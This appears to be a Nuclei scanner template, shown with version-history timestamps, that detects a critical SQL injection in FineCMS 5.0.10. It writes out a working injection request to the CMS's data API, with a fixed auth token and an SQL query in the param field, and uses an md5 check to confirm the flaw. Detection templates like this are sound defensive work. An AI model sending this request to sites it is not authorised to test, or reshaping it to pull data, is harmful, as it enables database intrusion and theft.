2022-06-10 13:58:24 +00:00
id : finecms-sqli
info :
name : FineCMS 5.0.10 - SQL Injection
author : ritikchaddha
2022-09-29 13:38:41 +00:00
severity : critical
2022-06-10 13:58:24 +00:00
description : |
2022-09-29 13:38:41 +00:00
FineCMS 5.0.10 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-06-10 13:58:24 +00:00
reference :
- https://blog.csdn.net/dfdhxb995397/article/details/101385340
2022-09-29 13:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-89
2022-06-10 13:58:24 +00:00
tags : finecms,sqli
2022-06-30 03:00:16 +00:00
variables :
num : "999999999"
2022-06-10 13:58:24 +00:00
requests :
- method : GET
path :
2022-06-30 03:00:16 +00:00
- '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5({{num}})%27'
2022-06-10 13:58:24 +00:00
matchers :
- type : word
words :
2022-06-30 03:00:16 +00:00
- '{{md5({{num}})}}'
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28